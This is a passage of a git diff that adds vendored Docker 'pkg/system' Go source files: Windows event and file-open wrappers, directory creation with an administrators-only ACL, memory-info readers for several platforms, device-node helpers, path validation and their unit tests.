modkernel32.NewProc("SetEvent") + procResetEvent = modkernel32.NewProc("ResetEvent") + procPulseEvent = modkernel32.NewProc("PulseEvent") +) + +// CreateEvent implements win32 CreateEventW func in golang. It will create an event object. +func CreateEvent(eventAttributes *syscall.SecurityAttributes, manualReset bool, initialState bool, name string) (handle syscall.Handle, err error) { + namep, _ := syscall.UTF16PtrFromString(name) + var _p1 uint32 + if manualReset { + _p1 = 1 + } + var _p2 uint32 + if initialState { + _p2 = 1 + } + r0, _, e1 := procCreateEvent.Call(uintptr(unsafe.Pointer(eventAttributes)), uintptr(_p1), uintptr(_p2), uintptr(unsafe.Pointer(namep))) + use(unsafe.Pointer(namep)) + handle = syscall.Handle(r0) + if handle == syscall.InvalidHandle { + err = e1 + } + return +} + +// OpenEvent implements win32 OpenEventW func in golang. It opens an event object. +func OpenEvent(desiredAccess uint32, inheritHandle bool, name string) (handle syscall.Handle, err error) { + namep, _ := syscall.UTF16PtrFromString(name) + var _p1 uint32 + if inheritHandle { + _p1 = 1 + } + r0, _, e1 := procOpenEvent.Call(uintptr(desiredAccess), uintptr(_p1), uintptr(unsafe.Pointer(namep))) + use(unsafe.Pointer(namep)) + handle = syscall.Handle(r0) + if handle == syscall.InvalidHandle { + err = e1 + } + return +} + +// SetEvent implements win32 SetEvent func in golang. +func SetEvent(handle syscall.Handle) (err error) { + return setResetPulse(handle, procSetEvent) +} + +// ResetEvent implements win32 ResetEvent func in golang. +func ResetEvent(handle syscall.Handle) (err error) { + return setResetPulse(handle, procResetEvent) +} + +// PulseEvent implements win32 PulseEvent func in golang. +func PulseEvent(handle syscall.Handle) (err error) { + return setResetPulse(handle, procPulseEvent) +} + +func setResetPulse(handle syscall.Handle, proc *windows.LazyProc) (err error) { + r0, _, _ := proc.Call(uintptr(handle)) + if r0 != 0 { + err = syscall.Errno(r0) + } + return +} + +var temp unsafe.Pointer + +// use ensures a variable is kept alive without the GC freeing while still needed +func use(p unsafe.Pointer) { + temp = p +} diff --git a/vendor/github.com/docker/docker/pkg/system/exitcode.go b/vendor/github.com/docker/docker/pkg/system/exitcode.go new file mode 100644 index 0000000000..60f0514b1d --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/exitcode.go @@ -0,0 +1,33 @@ +package system + +import ( + "fmt" + "os/exec" + "syscall" +) + +// GetExitCode returns the ExitStatus of the specified error if its type is +// exec.ExitError, returns 0 and an error otherwise. +func GetExitCode(err error) (int, error) { + exitCode := 0 + if exiterr, ok := err.(*exec.ExitError); ok { + if procExit, ok := exiterr.Sys().(syscall.WaitStatus); ok { + return procExit.ExitStatus(), nil + } + } + return exitCode, fmt.Errorf("failed to get exit code") +} + +// ProcessExitCode process the specified error and returns the exit status code +// if the error was of type exec.ExitError, returns nothing otherwise. +func ProcessExitCode(err error) (exitCode int) { + if err != nil { + var exiterr error + if exitCode, exiterr = GetExitCode(err); exiterr != nil { + // TODO: Fix this so we check the error's text. + // we've failed to retrieve exit code, so we set it to 127 + exitCode = 127 + } + } + return +} diff --git a/vendor/github.com/docker/docker/pkg/system/filesys.go b/vendor/github.com/docker/docker/pkg/system/filesys.go new file mode 100644 index 0000000000..810c794786 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/filesys.go @@ -0,0 +1,54 @@ +// +build !windows + +package system + +import ( + "os" + "path/filepath" +) + +// MkdirAllWithACL is a wrapper for MkdirAll that creates a directory +// ACL'd for Builtin Administrators and Local System. +func MkdirAllWithACL(path string, perm os.FileMode) error { + return MkdirAll(path, perm) +} + +// MkdirAll creates a directory named path along with any necessary parents, +// with permission specified by attribute perm for all dir created. +func MkdirAll(path string, perm os.FileMode) error { + return os.MkdirAll(path, perm) +} + +// IsAbs is a platform-specific wrapper for filepath.IsAbs. +func IsAbs(path string) bool { + return filepath.IsAbs(path) +} + +// The functions below here are wrappers for the equivalents in the os package. +// They are passthrough on Unix platforms, and only relevant on Windows. + +// CreateSequential creates the named file with mode 0666 (before umask), truncating +// it if it already exists. If successful, methods on the returned +// File can be used for I/O; the associated file descriptor has mode +// O_RDWR. +// If there is an error, it will be of type *PathError. +func CreateSequential(name string) (*os.File, error) { + return os.Create(name) +} + +// OpenSequential opens the named file for reading. If successful, methods on +// the returned file can be used for reading; the associated file +// descriptor has mode O_RDONLY. +// If there is an error, it will be of type *PathError. +func OpenSequential(name string) (*os.File, error) { + return os.Open(name) +} + +// OpenFileSequential is the generalized open call; most users will use Open +// or Create instead. It opens the named file with specified flag +// (O_RDONLY etc.) and perm, (0666 etc.) if applicable. If successful, +// methods on the returned File can be used for I/O. +// If there is an error, it will be of type *PathError. +func OpenFileSequential(name string, flag int, perm os.FileMode) (*os.File, error) { + return os.OpenFile(name, flag, perm) +} diff --git a/vendor/github.com/docker/docker/pkg/system/filesys_windows.go b/vendor/github.com/docker/docker/pkg/system/filesys_windows.go new file mode 100644 index 0000000000..6094f01fd4 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/filesys_windows.go @@ -0,0 +1,236 @@ +// +build windows + +package system + +import ( + "os" + "path/filepath" + "regexp" + "strings" + "syscall" + "unsafe" + + winio "github.com/Microsoft/go-winio" +) + +// MkdirAllWithACL is a wrapper for MkdirAll that creates a directory +// ACL'd for Builtin Administrators and Local System. +func MkdirAllWithACL(path string, perm os.FileMode) error { + return mkdirall(path, true) +} + +// MkdirAll implementation that is volume path aware for Windows. +func MkdirAll(path string, _ os.FileMode) error { + return mkdirall(path, false) +} + +// mkdirall is a custom version of os.MkdirAll modified for use on Windows +// so that it is both volume path aware, and can create a directory with +// a DACL. +func mkdirall(path string, adminAndLocalSystem bool) error { + if re := regexp.MustCompile(`^\\\\\?\\Volume{[a-z0-9-]+}$`); re.MatchString(path) { + return nil + } + + // The rest of this method is largely copied from os.MkdirAll and should be kept + // as-is to ensure compatibility. + + // Fast path: if we can tell whether path is a directory or file, stop with success or error. + dir, err := os.Stat(path) + if err == nil { + if dir.IsDir() { + return nil + } + return &os.PathError{ + Op: "mkdir", + Path: path, + Err: syscall.ENOTDIR, + } + } + + // Slow path: make sure parent exists and then call Mkdir for path. + i := len(path) + for i > 0 && os.IsPathSeparator(path[i-1]) { // Skip trailing path separator. + i-- + } + + j := i + for j > 0 && !os.IsPathSeparator(path[j-1]) { // Scan backward over element. + j-- + } + + if j > 1 { + // Create parent + err = mkdirall(path[0:j-1], false) + if err != nil { + return err + } + } + + // Parent now exists; invoke os.Mkdir or mkdirWithACL and use its result. + if adminAndLocalSystem { + err = mkdirWithACL(path) + } else { + err = os.Mkdir(path, 0) + } + + if err != nil { + // Handle arguments like "foo/." by + // double-checking that directory doesn't exist. + dir, err1 := os.Lstat(path) + if err1 == nil && dir.IsDir() { + return nil + } + return err + } + return nil +} + +// mkdirWithACL creates a new directory. If there is an error, it will be of +// type *PathError. . +// +// This is a modified and combined version of os.Mkdir and syscall.Mkdir +// in golang to cater for creating a directory am ACL permitting full +// access, with inheritance, to any subfolder/file for Built-in Administrators +// and Local System. +func mkdirWithACL(name string) error { + sa := syscall.SecurityAttributes{Length: 0} + sddl := "D:P(A;OICI;GA;;;BA)(A;OICI;GA;;;SY)" + sd, err := winio.SddlToSecurityDescriptor(sddl) + if err != nil { + return &os.PathError{Op: "mkdir", Path: name, Err: err} + } + sa.Length = uint32(unsafe.Sizeof(sa)) + sa.InheritHandle = 1 + sa.SecurityDescriptor = uintptr(unsafe.Pointer(&sd[0])) + + namep, err := syscall.UTF16PtrFromString(name) + if err != nil { + return &os.PathError{Op: "mkdir", Path: name, Err: err} + } + + e := syscall.CreateDirectory(namep, &sa) + if e != nil { + return &os.PathError{Op: "mkdir", Path: name, Err: e} + } + return nil +} + +// IsAbs is a platform-specific wrapper for filepath.IsAbs. On Windows, +// golang filepath.IsAbs does not consider a path \windows\system32 as absolute +// as it doesn't start with a drive-letter/colon combination. However, in +// docker we need to verify things such as WORKDIR /windows/system32 in +// a Dockerfile (which gets translated to \windows\system32 when being processed +// by the daemon. This SHOULD be treated as absolute from a docker processing +// perspective. +func IsAbs(path string) bool { + if !filepath.IsAbs(path) { + if !strings.HasPrefix(path, string(os.PathSeparator)) { + return false + } + } + return true +} + +// The origin of the functions below here are the golang OS and syscall packages, +// slightly modified to only cope with files, not directories due to the +// specific use case. +// +// The alteration is to allow a file on Windows to be opened with +// FILE_FLAG_SEQUENTIAL_SCAN (particular for docker load), to avoid eating +// the standby list, particularly when accessing large files such as layer.tar. + +// CreateSequential creates the named file with mode 0666 (before umask), truncating +// it if it already exists. If successful, methods on the returned +// File can be used for I/O; the associated file descriptor has mode +// O_RDWR. +// If there is an error, it will be of type *PathError. +func CreateSequential(name string) (*os.File, error) { + return OpenFileSequential(name, os.O_RDWR|os.O_CREATE|os.O_TRUNC, 0) +} + +// OpenSequential opens the named file for reading. If successful, methods on +// the returned file can be used for reading; the associated file +// descriptor has mode O_RDONLY. +// If there is an error, it will be of type *PathError. +func OpenSequential(name string) (*os.File, error) { + return OpenFileSequential(name, os.O_RDONLY, 0) +} + +// OpenFileSequential is the generalized open call; most users will use Open +// or Create instead. +// If there is an error, it will be of type *PathError. +func OpenFileSequential(name string, flag int, _ os.FileMode) (*os.File, error) { + if name == "" { + return nil, &os.PathError{Op: "open", Path: name, Err: syscall.ENOENT} + } + r, errf := syscallOpenFileSequential(name, flag, 0) + if errf == nil { + return r, nil + } + return nil, &os.PathError{Op: "open", Path: name, Err: errf} +} + +func syscallOpenFileSequential(name string, flag int, _ os.FileMode) (file *os.File, err error) { + r, e := syscallOpenSequential(name, flag|syscall.O_CLOEXEC, 0) + if e != nil { + return nil, e + } + return os.NewFile(uintptr(r), name), nil +} + +func makeInheritSa() *syscall.SecurityAttributes { + var sa syscall.SecurityAttributes + sa.Length = uint32(unsafe.Sizeof(sa)) + sa.InheritHandle = 1 + return &sa +} + +func syscallOpenSequential(path string, mode int, _ uint32) (fd syscall.Handle, err error) { + if len(path) == 0 { + return syscall.InvalidHandle, syscall.ERROR_FILE_NOT_FOUND + } + pathp, err := syscall.UTF16PtrFromString(path) + if err != nil { + return syscall.InvalidHandle, err + } + var access uint32 + switch mode & (syscall.O_RDONLY | syscall.O_WRONLY | syscall.O_RDWR) { + case syscall.O_RDONLY: + access = syscall.GENERIC_READ + case syscall.O_WRONLY: + access = syscall.GENERIC_WRITE + case syscall.O_RDWR: + access = syscall.GENERIC_READ | syscall.GENERIC_WRITE + } + if mode&syscall.O_CREAT != 0 { + access |= syscall.GENERIC_WRITE + } + if mode&syscall.O_APPEND != 0 { + access &^= syscall.GENERIC_WRITE + access |= syscall.FILE_APPEND_DATA + } + sharemode := uint32(syscall.FILE_SHARE_READ | syscall.FILE_SHARE_WRITE) + var sa *syscall.SecurityAttributes + if mode&syscall.O_CLOEXEC == 0 { + sa = makeInheritSa() + } + var createmode uint32 + switch { + case mode&(syscall.O_CREAT|syscall.O_EXCL) == (syscall.O_CREAT | syscall.O_EXCL): + createmode = syscall.CREATE_NEW + case mode&(syscall.O_CREAT|syscall.O_TRUNC) == (syscall.O_CREAT | syscall.O_TRUNC): + createmode = syscall.CREATE_ALWAYS + case mode&syscall.O_CREAT == syscall.O_CREAT: + createmode = syscall.OPEN_ALWAYS + case mode&syscall.O_TRUNC == syscall.O_TRUNC: + createmode = syscall.TRUNCATE_EXISTING + default: + createmode = syscall.OPEN_EXISTING + } + // Use FILE_FLAG_SEQUENTIAL_SCAN rather than FILE_ATTRIBUTE_NORMAL as implemented in golang. + //https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858(v=vs.85).aspx + const fileFlagSequentialScan = 0x08000000 // FILE_FLAG_SEQUENTIAL_SCAN + h, e := syscall.CreateFile(pathp, access, sharemode, sa, createmode, fileFlagSequentialScan, 0) + return h, e +} diff --git a/vendor/github.com/docker/docker/pkg/system/lstat.go b/vendor/github.com/docker/docker/pkg/system/lstat.go new file mode 100644 index 0000000000..bd23c4d50b --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/lstat.go @@ -0,0 +1,19 @@ +// +build !windows + +package system + +import ( + "syscall" +) + +// Lstat takes a path to a file and returns +// a system.StatT type pertaining to that file. +// +// Throws an error if the file does not exist +func Lstat(path string) (*StatT, error) { + s := &syscall.Stat_t{} + if err := syscall.Lstat(path, s); err != nil { + return nil, err + } + return fromStatT(s) +} diff --git a/vendor/github.com/docker/docker/pkg/system/lstat_unix_test.go b/vendor/github.com/docker/docker/pkg/system/lstat_unix_test.go new file mode 100644 index 0000000000..062cf53bfe --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/lstat_unix_test.go @@ -0,0 +1,30 @@ +// +build linux freebsd + +package system + +import ( + "os" + "testing" +) + +// TestLstat tests Lstat for existing and non existing files +func TestLstat(t *testing.T) { + file, invalid, _, dir := prepareFiles(t) + defer os.RemoveAll(dir) + + statFile, err := Lstat(file) + if err != nil { + t.Fatal(err) + } + if statFile == nil { + t.Fatal("returned empty stat for existing file") + } + + statInvalid, err := Lstat(invalid) + if err == nil { + t.Fatal("did not return error for non-existing file") + } + if statInvalid != nil { + t.Fatal("returned non-nil stat for non-existing file") + } +} diff --git a/vendor/github.com/docker/docker/pkg/system/lstat_windows.go b/vendor/github.com/docker/docker/pkg/system/lstat_windows.go new file mode 100644 index 0000000000..49e87eb40b --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/lstat_windows.go @@ -0,0 +1,25 @@ +// +build windows + +package system + +import ( + "os" +) + +// Lstat calls os.Lstat to get a fileinfo interface back. +// This is then copied into our own locally defined structure. +// Note the Linux version uses fromStatT to do the copy back, +// but that not strictly necessary when already in an OS specific module. +func Lstat(path string) (*StatT, error) { + fi, err := os.Lstat(path) + if err != nil { + return nil, err + } + + return &StatT{ + name: fi.Name(), + size: fi.Size(), + mode: fi.Mode(), + modTime: fi.ModTime(), + isDir: fi.IsDir()}, nil +} diff --git a/vendor/github.com/docker/docker/pkg/system/meminfo.go b/vendor/github.com/docker/docker/pkg/system/meminfo.go new file mode 100644 index 0000000000..3b6e947e67 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/meminfo.go @@ -0,0 +1,17 @@ +package system + +// MemInfo contains memory statistics of the host system. +type MemInfo struct { + // Total usable RAM (i.e. physical RAM minus a few reserved bits and the + // kernel binary code). + MemTotal int64 + + // Amount of free memory. + MemFree int64 + + // Total amount of swap space available. + SwapTotal int64 + + // Amount of swap space that is currently unused. + SwapFree int64 +} diff --git a/vendor/github.com/docker/docker/pkg/system/meminfo_linux.go b/vendor/github.com/docker/docker/pkg/system/meminfo_linux.go new file mode 100644 index 0000000000..385f1d5e73 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/meminfo_linux.go @@ -0,0 +1,65 @@ +package system + +import ( + "bufio" + "io" + "os" + "strconv" + "strings" + + "github.com/docker/go-units" +) + +// ReadMemInfo retrieves memory statistics of the host system and returns a +// MemInfo type. +func ReadMemInfo() (*MemInfo, error) { + file, err := os.Open("/proc/meminfo") + if err != nil { + return nil, err + } + defer file.Close() + return parseMemInfo(file) +} + +// parseMemInfo parses the /proc/meminfo file into +// a MemInfo object given an io.Reader to the file. +// Throws error if there are problems reading from the file +func parseMemInfo(reader io.Reader) (*MemInfo, error) { + meminfo := &MemInfo{} + scanner := bufio.NewScanner(reader) + for scanner.Scan() { + // Expected format: ["MemTotal:", "1234", "kB"] + parts := strings.Fields(scanner.Text()) + + // Sanity checks: Skip malformed entries. + if len(parts) < 3 || parts[2] != "kB" { + continue + } + + // Convert to bytes. + size, err := strconv.Atoi(parts[1]) + if err != nil { + continue + } + bytes := int64(size) * units.KiB + + switch parts[0] { + case "MemTotal:": + meminfo.MemTotal = bytes + case "MemFree:": + meminfo.MemFree = bytes + case "SwapTotal:": + meminfo.SwapTotal = bytes + case "SwapFree:": + meminfo.SwapFree = bytes + } + + } + + // Handle errors that may have occurred during the reading of the file. + if err := scanner.Err(); err != nil { + return nil, err + } + + return meminfo, nil +} diff --git a/vendor/github.com/docker/docker/pkg/system/meminfo_solaris.go b/vendor/github.com/docker/docker/pkg/system/meminfo_solaris.go new file mode 100644 index 0000000000..7f4f84f73a --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/meminfo_solaris.go @@ -0,0 +1,128 @@ +// +build solaris,cgo + +package system + +import ( + "fmt" + "unsafe" +) + +// #cgo LDFLAGS: -lkstat +// #include +// #include +// #include +// #include +// #include +// #include +// struct swaptable *allocSwaptable(int num) { +// struct swaptable *st; +// struct swapent *swapent; +// st = (struct swaptable *)malloc(num * sizeof(swapent_t) + sizeof (int)); +// swapent = st->swt_ent; +// for (int i = 0; i < num; i++,swapent++) { +// swapent->ste_path = (char *)malloc(MAXPATHLEN * sizeof (char)); +// } +// st->swt_n = num; +// return st; +//} +// void freeSwaptable (struct swaptable *st) { +// struct swapent *swapent = st->swt_ent; +// for (int i = 0; i < st->swt_n; i++,swapent++) { +// free(swapent->ste_path); +// } +// free(st); +// } +// swapent_t getSwapEnt(swapent_t *ent, int i) { +// return ent[i]; +// } +// int64_t getPpKernel() { +// int64_t pp_kernel = 0; +// kstat_ctl_t *ksc; +// kstat_t *ks; +// kstat_named_t *knp; +// kid_t kid; +// +// if ((ksc = kstat_open()) == NULL) { +// return -1; +// } +// if ((ks = kstat_lookup(ksc, "unix", 0, "system_pages")) == NULL) { +// return -1; +// } +// if (((kid = kstat_read(ksc, ks, NULL)) == -1) || +// ((knp = kstat_data_lookup(ks, "pp_kernel")) == NULL)) { +// return -1; +// } +// switch (knp->data_type) { +// case KSTAT_DATA_UINT64: +// pp_kernel = knp->value.ui64; +// break; +// case KSTAT_DATA_UINT32: +// pp_kernel = knp->value.ui32; +// break; +// } +// pp_kernel *= sysconf(_SC_PAGESIZE); +// return (pp_kernel > 0 ? pp_kernel : -1); +// } +import "C" + +// Get the system memory info using sysconf same as prtconf +func getTotalMem() int64 { + pagesize := C.sysconf(C._SC_PAGESIZE) + npages := C.sysconf(C._SC_PHYS_PAGES) + return int64(pagesize * npages) +} + +func getFreeMem() int64 { + pagesize := C.sysconf(C._SC_PAGESIZE) + npages := C.sysconf(C._SC_AVPHYS_PAGES) + return int64(pagesize * npages) +} + +// ReadMemInfo retrieves memory statistics of the host system and returns a +// MemInfo type. +func ReadMemInfo() (*MemInfo, error) { + + ppKernel := C.getPpKernel() + MemTotal := getTotalMem() + MemFree := getFreeMem() + SwapTotal, SwapFree, err := getSysSwap() + + if ppKernel < 0 || MemTotal < 0 || MemFree < 0 || SwapTotal < 0 || + SwapFree < 0 { + return nil, fmt.Errorf("error getting system memory info %v\n", err) + } + + meminfo := &MemInfo{} + // Total memory is total physical memory less than memory locked by kernel + meminfo.MemTotal = MemTotal - int64(ppKernel) + meminfo.MemFree = MemFree + meminfo.SwapTotal = SwapTotal + meminfo.SwapFree = SwapFree + + return meminfo, nil +} + +func getSysSwap() (int64, int64, error) { + var tSwap int64 + var fSwap int64 + var diskblksPerPage int64 + num, err := C.swapctl(C.SC_GETNSWP, nil) + if err != nil { + return -1, -1, err + } + st := C.allocSwaptable(num) + _, err = C.swapctl(C.SC_LIST, unsafe.Pointer(st)) + if err != nil { + C.freeSwaptable(st) + return -1, -1, err + } + + diskblksPerPage = int64(C.sysconf(C._SC_PAGESIZE) >> C.DEV_BSHIFT) + for i := 0; i < int(num); i++ { + swapent := C.getSwapEnt(&st.swt_ent[0], C.int(i)) + tSwap += int64(swapent.ste_pages) * diskblksPerPage + fSwap += int64(swapent.ste_free) * diskblksPerPage + } + C.freeSwaptable(st) + return tSwap, fSwap, nil +} diff --git a/vendor/github.com/docker/docker/pkg/system/meminfo_unix_test.go b/vendor/github.com/docker/docker/pkg/system/meminfo_unix_test.go new file mode 100644 index 0000000000..44f5562882 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/meminfo_unix_test.go @@ -0,0 +1,40 @@ +// +build linux freebsd + +package system + +import ( + "strings" + "testing" + + "github.com/docker/go-units" +) + +// TestMemInfo tests parseMemInfo with a static meminfo string +func TestMemInfo(t *testing.T) { + const input = ` + MemTotal: 1 kB + MemFree: 2 kB + SwapTotal: 3 kB + SwapFree: 4 kB + Malformed1: + Malformed2: 1 + Malformed3: 2 MB + Malformed4: X kB + ` + meminfo, err := parseMemInfo(strings.NewReader(input)) + if err != nil { + t.Fatal(err) + } + if meminfo.MemTotal != 1*units.KiB { + t.Fatalf("Unexpected MemTotal: %d", meminfo.MemTotal) + } + if meminfo.MemFree != 2*units.KiB { + t.Fatalf("Unexpected MemFree: %d", meminfo.MemFree) + } + if meminfo.SwapTotal != 3*units.KiB { + t.Fatalf("Unexpected SwapTotal: %d", meminfo.SwapTotal) + } + if meminfo.SwapFree != 4*units.KiB { + t.Fatalf("Unexpected SwapFree: %d", meminfo.SwapFree) + } +} diff --git a/vendor/github.com/docker/docker/pkg/system/meminfo_unsupported.go b/vendor/github.com/docker/docker/pkg/system/meminfo_unsupported.go new file mode 100644 index 0000000000..3ce019dffd --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/meminfo_unsupported.go @@ -0,0 +1,8 @@ +// +build !linux,!windows,!solaris + +package system + +// ReadMemInfo is not supported on platforms other than linux and windows. +func ReadMemInfo() (*MemInfo, error) { + return nil, ErrNotSupportedPlatform +} diff --git a/vendor/github.com/docker/docker/pkg/system/meminfo_windows.go b/vendor/github.com/docker/docker/pkg/system/meminfo_windows.go new file mode 100644 index 0000000000..883944a4c5 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/meminfo_windows.go @@ -0,0 +1,45 @@ +package system + +import ( + "unsafe" + + "golang.org/x/sys/windows" +) + +var ( + modkernel32 = windows.NewLazySystemDLL("kernel32.dll") + + procGlobalMemoryStatusEx = modkernel32.NewProc("GlobalMemoryStatusEx") +) + +// https://msdn.microsoft.com/en-us/library/windows/desktop/aa366589(v=vs.85).aspx +// https://msdn.microsoft.com/en-us/library/windows/desktop/aa366770(v=vs.85).aspx +type memorystatusex struct { + dwLength uint32 + dwMemoryLoad uint32 + ullTotalPhys uint64 + ullAvailPhys uint64 + ullTotalPageFile uint64 + ullAvailPageFile uint64 + ullTotalVirtual uint64 + ullAvailVirtual uint64 + ullAvailExtendedVirtual uint64 +} + +// ReadMemInfo retrieves memory statistics of the host system and returns a +// MemInfo type. +func ReadMemInfo() (*MemInfo, error) { + msi := &memorystatusex{ + dwLength: 64, + } + r1, _, _ := procGlobalMemoryStatusEx.Call(uintptr(unsafe.Pointer(msi))) + if r1 == 0 { + return &MemInfo{}, nil + } + return &MemInfo{ + MemTotal: int64(msi.ullTotalPhys), + MemFree: int64(msi.ullAvailPhys), + SwapTotal: int64(msi.ullTotalPageFile), + SwapFree: int64(msi.ullAvailPageFile), + }, nil +} diff --git a/vendor/github.com/docker/docker/pkg/system/mknod.go b/vendor/github.com/docker/docker/pkg/system/mknod.go new file mode 100644 index 0000000000..73958182b4 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/mknod.go @@ -0,0 +1,22 @@ +// +build !windows + +package system + +import ( + "syscall" +) + +// Mknod creates a filesystem node (file, device special file or named pipe) named path +// with attributes specified by mode and dev. +func Mknod(path string, mode uint32, dev int) error { + return syscall.Mknod(path, mode, dev) +} + +// Mkdev is used to build the value of linux devices (in /dev/) which specifies major +// and minor number of the newly created device special file. +// Linux device nodes are a bit weird due to backwards compat with 16 bit device nodes. +// They are, from low to high: the lower 8 bits of the minor, then 12 bits of the major, +// then the top 12 bits of the minor. +func Mkdev(major int64, minor int64) uint32 { + return uint32(((minor & 0xfff00) << 12) | ((major & 0xfff) << 8) | (minor & 0xff)) +} diff --git a/vendor/github.com/docker/docker/pkg/system/mknod_windows.go b/vendor/github.com/docker/docker/pkg/system/mknod_windows.go new file mode 100644 index 0000000000..2e863c0215 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/mknod_windows.go @@ -0,0 +1,13 @@ +// +build windows + +package system + +// Mknod is not implemented on Windows. +func Mknod(path string, mode uint32, dev int) error { + return ErrNotSupportedPlatform +} + +// Mkdev is not implemented on Windows. +func Mkdev(major int64, minor int64) uint32 { + panic("Mkdev not implemented on Windows.") +} diff --git a/vendor/github.com/docker/docker/pkg/system/path_unix.go b/vendor/github.com/docker/docker/pkg/system/path_unix.go new file mode 100644 index 0000000000..c607c4db09 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/path_unix.go @@ -0,0 +1,14 @@ +// +build !windows + +package system + +// DefaultPathEnv is unix style list of directories to search for +// executables. Each directory is separated from the next by a colon +// ':' character . +const DefaultPathEnv = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + +// CheckSystemDriveAndRemoveDriveLetter verifies that a path, if it includes a drive letter, +// is the system drive. This is a no-op on Linux. +func CheckSystemDriveAndRemoveDriveLetter(path string) (string, error) { + return path, nil +} diff --git a/vendor/github.com/docker/docker/pkg/system/path_windows.go b/vendor/github.com/docker/docker/pkg/system/path_windows.go new file mode 100644 index 0000000000..cbfe2c1576 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/path_windows.go @@ -0,0 +1,37 @@ +// +build windows + +package system + +import ( + "fmt" + "path/filepath" + "strings" +) + +// DefaultPathEnv is deliberately empty on Windows as the default path will be set by +// the container. Docker has no context of what the default path should be. +const DefaultPathEnv = "" + +// CheckSystemDriveAndRemoveDriveLetter verifies and manipulates a Windows path. +// This is used, for example, when validating a user provided path in docker cp. +// If a drive letter is supplied, it must be the system drive. The drive letter +// is always removed. Also, it translates it to OS semantics (IOW / to \). We +// need the path in this syntax so that it can ultimately be contatenated with +// a Windows long-path which doesn't support drive-letters. Examples: +// C: --> Fail +// C:\ --> \ +// a --> a +// /a --> \a +// d:\ --> Fail +func CheckSystemDriveAndRemoveDriveLetter(path string) (string, error) { + if len(path) == 2 && string(path[1]) == ":" { + return "", fmt.Errorf("No relative path specified in %q", path) + } + if !filepath.IsAbs(path) || len(path) < 2 { + return filepath.FromSlash(path), nil + } + if string(path[1]) == ":" && !strings.EqualFold(string(path[0]), "c") { + return "", fmt.Errorf("The specified path is not on the system drive (C:)") + } + return filepath.FromSlash(path[2:]), nil +} diff --git a/vendor/github.com/docker/docker/pkg/system/path_windows_test.go b/vendor/github.com/docker/docker/pkg/system/path_windows_test.go new file mode 100644 index 0000000000..eccb26aaea --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/path_windows_test.go @@ -0,0 +1,78 @@ +// +build windows + +package system + +import "testing" + +// TestCheckSystemDriveAndRemoveDriveLetter tests CheckSystemDriveAndRemoveDriveLetter +func TestCheckSystemDriveAndRemoveDriveLetter(t *testing.T) { + // Fails if not C drive. + path, err := CheckSystemDriveAndRemoveDriveLetter(`d:\`) + if err == nil || (err != nil && err.Error() != "The specified path is not on the system drive (C:)") { + t.Fatalf("Expected error for d:") + } + + // Single character is unchanged + if path, err = CheckSystemDriveAndRemoveDriveLetter("z"); err != nil { + t.Fatalf("Single character should pass") + } + if path != "z" { + t.Fatalf("Single character should be unchanged") + } + + // Two characters without colon is unchanged + if path, err = CheckSystemDriveAndRemoveDriveLetter("AB"); err != nil { + t.Fatalf("2 characters without colon should pass") + } + if path != "AB" { + t.Fatalf("2 characters without colon should be unchanged") + } + + // Abs path without drive letter + if path, err = CheckSystemDriveAndRemoveDriveLetter(`\l`); err != nil { + t.Fatalf("abs path no drive letter should pass") + } + if path != `\l` { + t.Fatalf("abs path without drive letter should be unchanged") + } + + // Abs path without drive letter, linux style + if path, err = CheckSystemDriveAndRemoveDriveLetter(`/l`); err != nil { + t.Fatalf("abs path no drive letter linux style should pass") + } + if path != `\l` { + t.Fatalf("abs path without drive letter linux failed %s", path) + } + + // Drive-colon should be stripped + if path, err = CheckSystemDriveAndRemoveDriveLetter(`c:\`); err != nil { + t.Fatalf("An absolute path should pass") + } + if path != `\` { + t.Fatalf(`An absolute path should have been shortened to \ %s`, path) + } + + // Verify with a linux-style path + if path, err = CheckSystemDriveAndRemoveDriveLetter(`c:/`); err != nil { + t.Fatalf("An absolute path should pass") + } + if path != `\` { + t.Fatalf(`A linux style absolute path should have been shortened to \ %s`, path) + } + + // Failure on c: + if path, err = CheckSystemDriveAndRemoveDriveLetter(`c:`); err == nil { + t.Fatalf("c: should fail") + } + if err.Error() != `No relative path specified in "c:"` { + t.Fatalf(path, err) + } + + // Failure on d: + if path, err = CheckSystemDriveAndRemoveDriveLetter(`d:`); err == nil { + t.Fatalf("c: should fail") + } + if err.Error() != `No relative path specified in "d:"` { + t.Fatalf(path, err) + } +} diff --git a/vendor/github.com/docker/docker/pkg/system/stat.go b/vendor/github.com/docker/docker/pkg/system/stat.go new file mode 100644 index 0000000000..087034c5ec --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/stat.go @@ -0,0 +1,53 @@ +// +build !windows + +package system + +import ( + "syscall" +) + +// StatT type contains status of a file. It contains metadata +// like permission, owner, group, size, etc about a file. +type StatT struct { + mode uint32 + uid uint32 + gid uint32 + rdev uint64 + size int64 + mtim syscall.Timespec +} + +// Mode returns file's permission mode. +func (s StatT) Mode() uint32 { + return s.mode +} + +// UID returns file's user id of owner. +func (s StatT) UID() uint32 { + return s.uid +} + +// GID returns file's group id of owner. +func (s StatT) GID() uint32 { + return s.gid +} + +// Rdev returns file's device ID (if it's special file). +func (s StatT) Rdev() uint64 { + return s.rdev +} + +// Size returns file's size. +func (s StatT) Size() int64 { + return s.size +} + +// Mtim returns file's last modification time. +func (s StatT) Mtim() syscall.Timespec { + return s.mtim +} + +// GetLastModification returns file's last modification time. +func (s StatT) GetLastModification() syscall.Timespec { + return s.Mtim() +} diff --git a/vendor/github.com/docker/docker/pkg/system/stat_darwin.go b/vendor/github.com/docker/docker/pkg/system/stat_darwin.go new file mode 100644 index 